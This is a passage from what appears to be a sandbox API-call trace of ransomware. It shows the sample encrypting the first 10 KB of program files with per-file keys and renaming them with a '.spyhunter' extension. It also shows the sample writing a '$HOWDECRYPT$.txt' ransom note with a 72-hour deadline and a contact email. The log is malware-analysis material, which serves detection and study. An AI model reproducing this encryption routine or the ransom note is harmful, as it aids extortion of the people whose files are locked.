Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.ITS") returned 77 [0093.845] StrStrW (lpFirst="MSB1ESEN.ITS", lpSrch=".txt") returned 0x0 [0093.845] GetProcessHeap () returned 0x2c0000 [0093.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c238e0 [0093.845] ReadFile (in: hFile=0x174, lpBuffer=0x2c238e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f944, lpOverlapped=0x0 | out: lpBuffer=0x2c238e0*, lpNumberOfBytesRead=0x270f944*=0x2800, lpOverlapped=0x0) returned 1 [0093.865] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.865] WriteFile (in: hFile=0x174, lpBuffer=0x2c238e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f944, lpOverlapped=0x0 | out: lpBuffer=0x2c238e0*, lpNumberOfBytesWritten=0x270f944*=0x2800, lpOverlapped=0x0) returned 1 [0093.865] GetProcessHeap () returned 0x2c0000 [0093.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c238e0 | out: hHeap=0x2c0000) returned 1 [0093.867] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.867] WriteFile (in: hFile=0x174, lpBuffer=0x270f984*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f944, lpOverlapped=0x0 | out: lpBuffer=0x270f984*, lpNumberOfBytesWritten=0x270f944*=0x4, lpOverlapped=0x0) returned 1 [0095.886] WriteFile (in: hFile=0x174, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f944, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f944*=0x30, lpOverlapped=0x0) returned 1 [0095.886] CloseHandle (hObject=0x174) returned 1 [0096.332] GetProcessHeap () returned 0x2c0000 [0096.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0096.332] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.ITS.spyhunter") returned 87 [0096.332] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\msb1esen.its"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.ITS.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\msb1esen.its.spyhunter")) returned 1 [0096.333] GetProcessHeap () returned 0x2c0000 [0096.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0096.333] GetProcessHeap () returned 0x2c0000 [0096.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0096.333] GetProcessHeap () returned 0x2c0000 [0096.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377998 | out: hHeap=0x2c0000) returned 1 [0096.333] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f980 | out: pbBuffer=0x270f980) returned 1 [0096.333] GetProcessHeap () returned 0x2c0000 [0096.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0096.333] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f978*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f978*=0x30) returned 1 [0096.333] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Filters.xml" (normalized: "c:\\program files\\dvd maker\\shared\\filters.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.495] GetProcessHeap () returned 0x2c0000 [0096.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0096.495] GetProcessHeap () returned 0x2c0000 [0096.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d0b0 | out: hHeap=0x2c0000) returned 1 [0096.495] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f980 | out: pbBuffer=0x270f980) returned 1 [0096.495] GetProcessHeap () returned 0x2c0000 [0096.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0096.495] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f978*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f978*=0x30) returned 1 [0096.495] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0096.504] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 89 [0096.504] StrStrW (lpFirst="msolui100.rll", lpSrch=".txt") returned 0x0 [0096.504] GetProcessHeap () returned 0x2c0000 [0096.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c12890 [0096.505] ReadFile (in: hFile=0x174, lpBuffer=0x2c12890, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f93c, lpOverlapped=0x0 | out: lpBuffer=0x2c12890*, lpNumberOfBytesRead=0x270f93c*=0x2800, lpOverlapped=0x0) returned 1 [0096.611] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.611] WriteFile (in: hFile=0x174, lpBuffer=0x2c12890*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f93c, lpOverlapped=0x0 | out: lpBuffer=0x2c12890*, lpNumberOfBytesWritten=0x270f93c*=0x2800, lpOverlapped=0x0) returned 1 [0096.611] GetProcessHeap () returned 0x2c0000 [0096.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c12890 | out: hHeap=0x2c0000) returned 1 [0096.611] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.611] WriteFile (in: hFile=0x174, lpBuffer=0x270f97c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f93c, lpOverlapped=0x0 | out: lpBuffer=0x270f97c*, lpNumberOfBytesWritten=0x270f93c*=0x4, lpOverlapped=0x0) returned 1 [0096.636] WriteFile (in: hFile=0x174, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f93c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f93c*=0x30, lpOverlapped=0x0) returned 1 [0096.636] CloseHandle (hObject=0x174) returned 1 [0096.636] GetProcessHeap () returned 0x2c0000 [0096.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c150d8 [0096.636] wnsprintfW (in: pszDest=0x2c150d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll.spyhunter") returned 99 [0096.636] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll.spyhunter" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll.spyhunter")) returned 1 [0096.637] GetProcessHeap () returned 0x2c0000 [0096.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c150d8 | out: hHeap=0x2c0000) returned 1 [0096.637] GetProcessHeap () returned 0x2c0000 [0096.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0096.637] GetProcessHeap () returned 0x2c0000 [0096.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a460 | out: hHeap=0x2c0000) returned 1 [0096.637] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0096.638] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0096.638] WriteFile (in: hFile=0x174, lpBuffer=0x270f8af*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270f9d8, lpOverlapped=0x0 | out: lpBuffer=0x270f8af*, lpNumberOfBytesWritten=0x270f9d8*=0x127, lpOverlapped=0x0) returned 1 [0096.639] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0096.639] WriteFile (in: hFile=0x174, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270f9d8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270f9d8*=0x2ac, lpOverlapped=0x0) returned 1 [0096.639] CloseHandle (hObject=0x174) returned 1 [0096.639] GetProcessHeap () returned 0x2c0000 [0096.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a360 | out: hHeap=0x2c0000) returned 1 [0096.639] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f978 | out: pbBuffer=0x270f978) returned 1 [0096.639] GetProcessHeap () returned 0x2c0000 [0096.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0096.639] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f970*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f970*=0x30) returned 1 [0096.639] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0096.640] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 82 [0096.640] StrStrW (lpFirst="Sybase.xsl", lpSrch=".txt") returned 0x0 [0096.640] GetProcessHeap () returned 0x2c0000 [0096.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c150d8 [0096.640] ReadFile (in: hFile=0x174, lpBuffer=0x2c150d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f934, lpOverlapped=0x0 | out: lpBuffer=0x2c150d8*, lpNumberOfBytesRead=0x270f934*=0x2800, lpOverlapped=0x0) returned 1 [0096.732] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.732] WriteFile (in: hFile=0x174, lpBuffer=0x2c150d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f934, lpOverlapped=0x0 | out: lpBuffer=0x2c150d8*, lpNumberOfBytesWritten=0x270f934*=0x2800, lpOverlapped=0x0) returned 1 [0096.732] GetProcessHeap () returned 0x2c0000 [0096.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c150d8 | out: hHeap=0x2c0000) returned 1 [0096.732] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.733] WriteFile (in: hFile=0x174, lpBuffer=0x270f974*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f934, lpOverlapped=0x0 | out: lpBuffer=0x270f974*, lpNumberOfBytesWritten=0x270f934*=0x4, lpOverlapped=0x0) returned 1 [0096.734] WriteFile (in: hFile=0x174, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f934, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f934*=0x30, lpOverlapped=0x0) returned 1 [0096.734] CloseHandle (hObject=0x174) returned 1 [0096.734] GetProcessHeap () returned 0x2c0000 [0096.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c12890 [0096.734] wnsprintfW (in: pszDest=0x2c12890, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.spyhunter") returned 92 [0096.734] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.spyhunter" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl.spyhunter")) returned 1 [0096.735] GetProcessHeap () returned 0x2c0000 [0096.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c12890 | out: hHeap=0x2c0000) returned 1 [0096.735] GetProcessHeap () returned 0x2c0000 [0096.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0096.735] GetProcessHeap () returned 0x2c0000 [0096.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34eba8 | out: hHeap=0x2c0000) returned 1 [0096.735] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f970 | out: pbBuffer=0x270f970) returned 1 [0096.735] GetProcessHeap () returned 0x2c0000 [0096.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0096.735] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f968*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f968*=0x30) returned 1 [0096.735] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0096.735] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 81 [0096.735] StrStrW (lpFirst="sql90.xsl", lpSrch=".txt") returned 0x0 [0096.735] GetProcessHeap () returned 0x2c0000 [0096.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c12890 [0096.736] ReadFile (in: hFile=0x174, lpBuffer=0x2c12890, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f92c, lpOverlapped=0x0 | out: lpBuffer=0x2c12890*, lpNumberOfBytesRead=0x270f92c*=0x2800, lpOverlapped=0x0) returned 1 [0096.744] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.744] WriteFile (in: hFile=0x174, lpBuffer=0x2c12890*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f92c, lpOverlapped=0x0 | out: lpBuffer=0x2c12890*, lpNumberOfBytesWritten=0x270f92c*=0x2800, lpOverlapped=0x0) returned 1 [0096.744] GetProcessHeap () returned 0x2c0000 [0096.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c12890 | out: hHeap=0x2c0000) returned 1 [0096.744] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.744] WriteFile (in: hFile=0x174, lpBuffer=0x270f96c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f92c, lpOverlapped=0x0 | out: lpBuffer=0x270f96c*, lpNumberOfBytesWritten=0x270f92c*=0x4, lpOverlapped=0x0) returned 1 [0096.903] WriteFile (in: hFile=0x174, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f92c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f92c*=0x30, lpOverlapped=0x0) returned 1 [0096.903] CloseHandle (hObject=0x174) returned 1 [0096.903] GetProcessHeap () returned 0x2c0000 [0096.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0096.903] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.spyhunter") returned 91 [0096.903] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.spyhunter" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl.spyhunter")) returned 1 [0096.904] GetProcessHeap () returned 0x2c0000 [0096.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0096.904] GetProcessHeap () returned 0x2c0000 [0096.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0096.904] GetProcessHeap () returned 0x2c0000 [0096.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34eab8 | out: hHeap=0x2c0000) returned 1 [0096.904] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f970 | out: pbBuffer=0x270f970) returned 1 [0096.904] GetProcessHeap () returned 0x2c0000 [0096.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0096.904] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f968*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f968*=0x30) returned 1 [0096.904] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0097.086] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 67 [0097.086] StrStrW (lpFirst="AG00175_.GIF", lpSrch=".txt") returned 0x0 [0097.086] GetProcessHeap () returned 0x2c0000 [0097.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c19920 [0097.086] ReadFile (in: hFile=0x170, lpBuffer=0x2c19920, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f92c, lpOverlapped=0x0 | out: lpBuffer=0x2c19920*, lpNumberOfBytesRead=0x270f92c*=0xd32, lpOverlapped=0x0) returned 1 [0097.172] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffff2ce, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.172] WriteFile (in: hFile=0x170, lpBuffer=0x2c19920*, nNumberOfBytesToWrite=0xd32, lpNumberOfBytesWritten=0x270f92c, lpOverlapped=0x0 | out: lpBuffer=0x2c19920*, lpNumberOfBytesWritten=0x270f92c*=0xd32, lpOverlapped=0x0) returned 1 [0097.173] GetProcessHeap () returned 0x2c0000 [0097.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c19920 | out: hHeap=0x2c0000) returned 1 [0097.173] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.174] WriteFile (in: hFile=0x170, lpBuffer=0x270f96c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f92c, lpOverlapped=0x0 | out: lpBuffer=0x270f96c*, lpNumberOfBytesWritten=0x270f92c*=0x4, lpOverlapped=0x0) returned 1 [0097.174] WriteFile (in: hFile=0x170, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f92c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f92c*=0x30, lpOverlapped=0x0) returned 1 [0097.174] CloseHandle (hObject=0x170) returned 1 [0097.174] GetProcessHeap () returned 0x2c0000 [0097.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c1e168 [0097.174] wnsprintfW (in: pszDest=0x2c1e168, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF.spyhunter") returned 77 [0097.174] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif.spyhunter")) returned 1 [0097.217] GetProcessHeap () returned 0x2c0000 [0097.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c1e168 | out: hHeap=0x2c0000) returned 1 [0097.217] GetProcessHeap () returned 0x2c0000 [0097.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0097.217] GetProcessHeap () returned 0x2c0000 [0097.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x359cd0 | out: hHeap=0x2c0000) returned 1 [0097.217] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f968 | out: pbBuffer=0x270f968) returned 1 [0097.217] GetProcessHeap () returned 0x2c0000 [0097.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0097.217] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f960*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f960*=0x30) returned 1 [0097.217] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0097.863] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 67 [0097.863] StrStrW (lpFirst="DD01178_.WMF", lpSrch=".txt") returned 0x0 [0097.863] GetProcessHeap () returned 0x2c0000 [0097.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c301b0 [0097.863] ReadFile (in: hFile=0x174, lpBuffer=0x2c301b0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f924, lpOverlapped=0x0 | out: lpBuffer=0x2c301b0*, lpNumberOfBytesRead=0x270f924*=0xed4, lpOverlapped=0x0) returned 1 [0097.877] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xfffff12c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.877] WriteFile (in: hFile=0x174, lpBuffer=0x2c301b0*, nNumberOfBytesToWrite=0xed4, lpNumberOfBytesWritten=0x270f924, lpOverlapped=0x0 | out: lpBuffer=0x2c301b0*, lpNumberOfBytesWritten=0x270f924*=0xed4, lpOverlapped=0x0) returned 1 [0097.877] GetProcessHeap () returned 0x2c0000 [0097.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c301b0 | out: hHeap=0x2c0000) returned 1 [0097.877] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.878] WriteFile (in: hFile=0x174, lpBuffer=0x270f964*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f924, lpOverlapped=0x0 | out: lpBuffer=0x270f964*, lpNumberOfBytesWritten=0x270f924*=0x4, lpOverlapped=0x0) returned 1 [0097.878] WriteFile (in: hFile=0x174, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f924, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f924*=0x30, lpOverlapped=0x0) returned 1 [0097.878] CloseHandle (hObject=0x174) returned 1 [0097.893] GetProcessHeap () returned 0x2c0000 [0097.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x38c7a8 [0097.896] wnsprintfW (in: 